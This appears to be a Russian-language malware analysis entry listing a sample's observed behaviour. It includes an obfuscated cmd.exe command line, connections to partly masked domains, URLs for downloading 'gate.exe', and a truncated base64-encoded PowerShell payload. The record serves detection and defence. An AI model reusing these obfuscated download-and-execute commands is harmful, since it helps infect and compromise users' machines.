Техническая информация
- '<SYSTEM32>\cmd.exe' nTwzpWzaWdDw ipEzAQbiMzWzBBkCP ARjYYtlS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %qslmvWdDzJjzpfF%=VsdsUwpUNvv&&set %HGnuERbpkl%=p&&set %VFWpEGpZZlARO%=o^w&...
- 'pe##igon.hu':80
- http://pe##igon.hu/gate.exe
- http://www.pe##igon.hu/gate.exe
- DNS ASK pe##igon.hu
- DNS ASK va###im9.com
- '<SYSTEM32>\cmd.exe' nTwzpWzaWdDw ipEzAQbiMzWzBBkCP ARjYYtlS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %qslmvWdDzJjzpfF%=VsdsUwpUNvv&&set %HGnuERbpkl%=p&&set %VFWpEGpZZlARO%=o^w&...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABuAEUAdwAtAG8AQgBqAGUAQwB0ACAAUwBZAFMAdABFAG0ALgBJAG8ALgBjAE8ATQBwAFIARQBTAHMASQBPAE4ALgBkAEUARgBMAEEAVABlAFMAdABSAGUAYQBtACgAWwBzAFkAUwBUAEUAbQAuAEkAbwAuAE0AZQBtAE8AUgB5AFMAdAByAGUAYQBtAF...